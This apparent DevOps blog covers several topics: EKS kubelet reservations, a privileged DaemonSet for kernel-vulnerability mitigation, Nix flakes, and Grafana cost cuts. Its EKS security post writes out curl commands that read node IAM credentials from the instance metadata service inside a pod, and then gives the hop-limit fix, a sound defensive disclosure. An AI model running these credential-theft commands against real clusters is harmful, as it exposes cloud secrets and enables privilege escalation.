2026

AWS EKS node system and kubelet resource reservation

It is well known that enabling prefix delegation on the CNI plugin/addon can drastically increase a node's pod limit. This post is about whether and how AWS scales the node's system and kubelet resource reservations in general, and what happens when we tweak the kubelet's max-pods setting. Tweaking it can be beneficial, because nodes commonly ran out of IPs long before any reasonable resource utilization was reached.

System resource reservation

This one is easy, because AWS EKS managed nodes simply don't have any system resources reserved out of the box. The AWS documentation is really vague about setting it, but it says that if you must set it, you should only do so for incompressible resources (memory).

Kubelet resource reservation

How the kubelet's resource reservation for CPU and memory scales with instance size is not widely known and is really interesting. Let's start with CPU, which in the calculation is independent of max-pods.

  • The scaling of reserved CPU for the kubelet is calculated as the sum of 6% of the first core, 1% of the second core, 0.5% of the third and fourth cores, and 0.25% of the remaining cores.
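To make the tiers concrete, here is a minimal sketch of the calculation in Python. The function name is my own and the result is expressed in millicores (1 core = 1000m), so 6% of a core becomes 60m; treat it as an illustration of the rule above, not as the code AWS actually runs.

```python
def kubelet_reserved_cpu_millicores(cores: int) -> float:
    """Reserved CPU in millicores, following the tiers described above."""
    if cores < 1:
        raise ValueError("cores must be at least 1")

    # (number of cores in the tier, millicores reserved per core in that tier)
    tiers = [
        (1, 60.0),  # 6% of the first core
        (1, 10.0),  # 1% of the second core
        (2, 5.0),   # 0.5% of the third and fourth cores
    ]
    per_remaining_core = 2.5  # 0.25% of every core beyond the fourth

    reserved = 0.0
    remaining = cores
    for tier_cores, millicores_per_core in tiers:
        used = min(remaining, tier_cores)
        reserved += used * millicores_per_core
        remaining -= used
    reserved += remaining * per_remaining_core
    return reserved


for cores in (2, 4, 8, 96):
    print(f"{cores} cores -> {kubelet_reserved_cpu_millicores(cores)}m reserved")
```

The reservation grows very slowly: going from 4 to 96 cores only adds 2.5m per extra core.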

If we move on to memory, it is heavily dependent on max-pods.

  • The calculation of reserved memory is 255Mi + (11Mi * max_pods)
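As a quick sketch, the memory formula translates directly into a one-line Python function. The function name and the max_pods values 29 and 110 are only illustrative inputs I picked.

```python
def kubelet_reserved_memory_mi(max_pods: int) -> int:
    """Reserved memory in Mi: 255Mi + (11Mi * max_pods)."""
    if max_pods < 0:
        raise ValueError("max_pods cannot be negative")
    return 255 + 11 * max_pods


for max_pods in (29, 110):
    print(f"max_pods={max_pods} -> {kubelet_reserved_memory_mi(max_pods)}Mi reserved")
```

Every additional pod slot costs 11Mi of reservation, so max-pods quickly dominates the fixed 255Mi.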

Each instance type in AWS has a different default for max-pods, depending on its available network interfaces, and that default is normally lower than the recommended upper limit of 110 pods.
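The sketch below shows where those defaults come from. It assumes the commonly cited formula for the VPC CNI without prefix delegation, and the ENI and IP counts in the examples are what I believe those instance types offer, so verify them for the types you actually run.

```python
def default_max_pods(enis: int, ipv4_per_eni: int) -> int:
    """Assumed default: ENIs * (IPv4 addresses per ENI - 1) + 2.

    One address per ENI is taken by the interface itself; the +2 covers
    pods that run on the host network and need no IP of their own.
    """
    return enis * (ipv4_per_eni - 1) + 2


# Illustrative inputs, assumed rather than looked up live.
print("3 ENIs x 10 IPs ->", default_max_pods(3, 10))  # e.g. an m5.large
print("3 ENIs x 6 IPs  ->", default_max_pods(3, 6))   # e.g. a t3.medium
```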

Effect of tweaking max-pods

Now it becomes interesting: if I enable prefix delegation and set max-pods to 110, the kubelet reserved memory calculation still uses the much lower AWS default. So we have to do the calculation ourselves and set it accordingly, since AWS doesn't do it for us.
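A small sketch of doing that calculation by hand. The default of 29 pods is a hypothetical instance default, and the final line only renders the memory part of the kubelet's kube-reserved setting. How you pass it to your nodes depends on your AMI and bootstrap method, which I am not assuming anything about here.

```python
def kube_reserved_memory_mi(max_pods: int) -> int:
    """Reserved memory in Mi: 255Mi + (11Mi * max_pods)."""
    return 255 + 11 * max_pods


# Hypothetical node: instance default of 29 pods, raised to 110 with prefix delegation.
instance_default_max_pods = 29
tuned_max_pods = 110

still_reserved = kube_reserved_memory_mi(instance_default_max_pods)
should_reserve = kube_reserved_memory_mi(tuned_max_pods)
shortfall = should_reserve - still_reserved

# Memory part of the kubelet's kube-reserved setting, rendered as a flag value.
kube_reserved_flag = f"--kube-reserved=memory={should_reserve}Mi"

print(f"reserved by default: {still_reserved}Mi")
print(f"needed for {tuned_max_pods} pods: {should_reserve}Mi (shortfall {shortfall}Mi)")
print(kube_reserved_flag)
```

In this example the node would be under-reserving by 891Mi, which is memory the scheduler thinks it can hand out to pods.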

Thoughts on local privilege escalation vulnerabilities from a Kubernetes perspective

We have recently been hit by a wave of Linux kernel local privilege escalation vulnerabilities: Copy Fail (CVE-2026-31431), Dirty Frag (CVE-2026-43284, CVE-2026-43500) and Fragnesia. While the situation isn't ideal and the discovery frequency is likely driven by improvements in AI, temporary mitigations have been relatively simple: SSH into a Linux box, apply the temporary mitigation or install a system security update if one is available, and in some cases reboot afterwards. This can also be done for Kubernetes cluster nodes, but the situation changes once node autoscaling enters the picture. So how do we handle temporary mitigations of Kubernetes cluster nodes until an official patched image is released, when we constantly get new nodes and our temporarily patched nodes disappear?

Other options available

There are several paths to follow, some more passive than others. Let's go through some of the options. The most passive one is to do nothing and just wait for an upstream fix, which in the case of AWS EKS means a new AMI release. I'm confident that this option is more popular than most people realise. Another, less passive but manual, approach is to temporarily patch the nodes, but as we already discussed this is probably not viable if node autoscaling is a thing. I'm also pretty sure that this was the approach chosen for many smaller clusters without node autoscaling. There are definitely other options, such as building your own image or maybe patching via user data, but these require all existing nodes to be replaced, effectively leading to extra pod disruption. On top of that, user data changes are likely to touch Terraform/OpenTofu and, in AWS, also the launch template, giving developers slow feedback when testing.

My preferred option (so far)

The best approach I've seen so far is to deploy a DaemonSet with high privilege on all nodes and run your patches there. This of course adds an extra attack vector, which isn't ideal, but it is fast to develop and apply and doesn't touch the launch template, making iterations fast and lightweight. The example below is heavily inspired by an implementation provided by the Red Hat OpenShift team.

---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: privilege-escalation-patch
  namespace: kube-system

---
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: privilege-escalation-patch
  namespace: kube-system
  labels:
    app: privilege-escalation-patch
spec:
  selector:
    matchLabels:
      app: privilege-escalation-patch
  template:
    metadata:
      labels:
        app: privilege-escalation-patch
    spec:
      serviceAccountName: privilege-escalation-patch
      nodeSelector:
        kubernetes.io/os: linux
      tolerations:
        - operator: Exists
      terminationGracePeriodSeconds: 1
      containers:
        - name: privilege-escalation-patch
          image: debian:stable
          command:
            - /bin/sh
            - "-c"
            - |
              echo "YOUR PATCH SCRIPT GOES HERE"
              sleep infinity
          lifecycle:
            preStop:
              exec:
                command:
                  - /bin/sh
                  - "-c"
                  - |
                    echo "YOUR REMOVAL OF PATCH GOES HERE IF NEEDED"
          securityContext:
            privileged: true
          volumeMounts:
            - name: host-root
              mountPath: /host
      volumes:
        - name: host-root
          hostPath:
            path: /

AWS EKS vulnerability

Before we start, I must clarify that there are no newly discovered 0‑Day vulnerabilities in this blog post, but rather a moment of clarity realizing how bad an already‑existing unpatched (N‑Day) vulnerability can be under certain circumstances.

The vulnerability discussed here is that AWS EKS clusters (Kubernetes) by default allow pods to steal worker node credentials. This is bad, but the patch is relatively simple with few side effects. I will take you through how the vulnerability is exploited, an example of what would amplify the impact, how it is patched, and examples of what potentially breaks.

The exploit

When spinning up an AWS EKS cluster, depending on the method used, your worker nodes might end up with a launch template configuration that has the default hop limit of 2. This means that pods are allowed to call the instance metadata service, because two network hops are allowed. The instance metadata service is what the EC2 instance (worker node) uses to get information about itself and its environment, including credentials, and this is where our exploit begins. The example assumes that you can gain access to the cluster's pods or spin up new ones. Be careful if you follow along, because the credentials, even though temporary, might end up in your logs.

# Spin up a new pod with an interactive shell
kubectl run -n default -i --tty --rm debug --image=alpine:latest --restart=Never -- sh

# Install curl
apk update && apk add curl

# Get a token from the metadata service and keep it in a shell variable
TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")

We have now obtained a token from the metadata service that can be used to retrieve the EC2 instance role name and its credentials. Continuing in the same pod as before.

# Get the EC2 instance role name and keep it in a shell variable
ROLE=$(curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/)

# Get the EC2 instance role credentials
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" "http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE"

We have now obtained a valid set of AWS credentials with the same permission scope as your EC2 instance role.

The impact

It is very common for AWS EKS worker nodes to have access to pull container images or read data from SSM Parameter Store and probably more. In some environments where predictable naming patterns exist, decrypted access to certain secrets may still be possible even with limited list/describe permissions, which makes the impact more serious than initially expected. Some teams might prefer SSM Parameter Store for storing secrets over Secrets Manager, making the impact much worse.

The patch

To prevent pods from accessing the instance metadata service, set the EC2 instance metadata hop limit to 1 in your worker node launch templates. This blocks pod‑level IMDS access while keeping node‑level functionality intact. Be aware that some Kubernetes add‑ons or deployment tooling may rely on IMDS for cluster, network, or storage metadata. These components may need additional configuration, such as supplying explicit parameters or assigning dedicated IAM roles. The exact impact varies between setups, so it's important to evaluate this change in a non‑production environment first. Here are things I have discovered, but you might have more.

  • AWS Load Balancer Controller can no longer get the VPC ID, so we need to supply it.
  • EBS CSI driver will first attempt to call the metadata service for information, then fail, throwing an error and then falling back to getting it from Kubernetes instead.
  • Flux Image Reflector Controller can no longer pull images from ECR, so an IRSA role needs to be supplied.
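To check whether a launch template is affected, a small audit helper along these lines could be run against its metadata options. This is a sketch: the function name is my own, the dictionary keys follow the EC2 API's MetadataOptions field names, and treating missing fields as exposed is a deliberately conservative assumption of mine. It also assumes that the hop limit only constrains the token-based (IMDSv2) flow, so a template that still allows IMDSv1 is reported as exposed, and it ignores pods running on the host network.

```python
def pods_can_reach_imds(metadata_options: dict) -> bool:
    """Return True if pods on the node can likely reach the metadata service."""
    # IMDS switched off entirely: nothing to reach.
    if metadata_options.get("HttpEndpoint", "enabled") == "disabled":
        return False

    # Assumption: without mandatory tokens (IMDSv1 allowed), the hop limit
    # does not protect anything, so treat the node as exposed.
    if metadata_options.get("HttpTokens", "optional") != "required":
        return True

    # Missing hop limit is treated as 2 (exposed) to stay on the safe side.
    return metadata_options.get("HttpPutResponseHopLimit", 2) > 1


exposed = {"HttpTokens": "required", "HttpPutResponseHopLimit": 2}
patched = {"HttpTokens": "required", "HttpPutResponseHopLimit": 1}
print("exposed template:", pods_can_reach_imds(exposed))
print("patched template:", pods_can_reach_imds(patched))
```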

Disclaimer: This example reflects a generic EKS configuration and is not indicative of any specific environment.

How this blog uses Nix

Nix is an advanced tool for building, packaging, and configuring software in a reliable, reproducible and declarative way, and it has been gaining a lot of popularity over recent years. Nix first came up on my radar in the early 2020s, but it took a couple of years before I really started investing time in it beyond just reading. It is really powerful but also very different from what I was used to. I now use NixOS as my daily driver (work and home) and use Nix Flakes to declare my development shells in various projects. In this post we will go over how I first started using Nix and how I have declared a development shell for this blog using Nix Flakes.

The word Nix is used everywhere

The term "I use Nix" can have many meanings and is sometimes confusing. Let's go over some of them here.

  • Nix the functional language
  • Nix the package manager (together with its package collection, nixpkgs)
  • Nix the operating system also known as NixOS

There are probably more, but I think this might illustrate where the confusion comes from. Just know that people tend to only use the word "Nix" and you have to guess the context.

Home-manager is a great place to start

I started my practical journey with Nix by porting my dotfiles and packages into the Nix ecosystem using Home-manager, a basic system for managing your user environment using the Nix package manager and Nix libraries. For me it was a great starting point and I can really recommend this approach. At that time I was using Arch Linux, but Nix with home-manager could easily be set up on the side and I could slowly port my stuff when I felt like it. I also quickly found out that I have almost no system-level configuration, so I made the switch to NixOS after roughly a year and I have never looked back. See my NixOS configuration here: github.com/wcarlsen/config.

Flakes and development shells

Flakes have at this point basically become the de facto standard when using Nix. They add a much needed flake.lock file (which can be updated with nix flake update), making sure your configuration is reproducible. It is pretty simple to define a development shell using flakes. Take a look at this "minimal" example.

# flake.nix
{
  inputs = {
    nixpkgs.url = "github:nixos/nixpkgs/nixos-unstable";
    flake-utils.url = "github:numtide/flake-utils";
  };

  outputs = inputs:
    inputs.flake-utils.lib.eachDefaultSystem (system: let
      pkgs = import inputs.nixpkgs {
        inherit system;
      }; # this is just a fancy (but easy) way to define your system, e.g. x86_64-linux, aarch64-darwin, etc.
    in {
      devShells = {
        default = pkgs.mkShell {
          buildInputs = with pkgs; [
            cowsay # add your dependencies here
          ];
          shellHook = ''
            cowsay "COWABUNGA!" # add your custom shell hooks here
          '';
        };
      };
    });
}

The flake above consists of inputs, which define the branch of nixpkgs to use and pull in flake-utils as a way to define systems. The other part is outputs, where we output devShells but only define one, called default, using pkgs.mkShell and its attribute buildInputs to declare package dependencies. It should be noted that mkShell has other attributes as well, for example shellHook. You could imagine a simple Python project using uv as package manager, where buildInputs would contain Python and uv, and the shellHook would run uv sync to install all Python-specific dependencies. Another example would be an OpenTofu project, where we install all providers with tofu init in the shellHook.

The devShells can be invoked with the following nix command: nix develop. I tend to use direnv and just put use flake in my .envrc file, to have it automatically set up my development shell.

So how does this blog use Nix?

Now that we have some limited knowledge about Nix and Flakes, we can start looking at how this blog uses it. In the root of the GitHub project you will find a flake.nix which specifies MkDocs and all the plugins used to create this blog, and, because I use direnv, it will automatically install all dependencies and drop me into a development shell so I can start writing and validate my changes locally. I find the "holy trinity" flakes, direnv and make really useful. So now we have a reproducible development setup; how do we use it in places other than locally? Let's look at GitHub Actions as an example.

GitHub Actions and Flakes

Because we have defined all of our dependencies in a Flake it becomes really easy to utilize it in a GitHub Action.

name: build
on:
  pull_request:
    branches:
      - main
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Install Nix
        uses: cachix/install-nix-action@v30
        with:
          extra_nix_config: |
            access-tokens = github.com=${{ secrets.GITHUB_TOKEN }}
      - name: Build
        run: nix develop --command make build

We see that it doesn't really require much effort at all, and changes to my local development don't require updates to my GitHub Actions workflow (unless I change the Makefile interface).

Cost savings Grafana Cloud follow up

In the previous post I wrote about our efforts to reduce cost for Grafana Cloud metrics. There I went over the three main things we implemented:

  • Reduced sample rates
  • Filter/drop unused metrics (keep only used ones)
  • Enable adaptive metrics

but I also ended up concluding that we lacked impact feedback and only had proxy indicators. Our goal was ambitious: more concretely, we set out to save 80% on our metrics bill. This post serves as a conclusion on our efforts.

Conclusion

We now know that we almost reached that goal with a 78% reduction in metrics cost alone.

Implementation aftermath

Enabling auto-mode for adaptive metrics was by far the most invasive change and we saw some of the developers' dashboards break, but fewer than anticipated.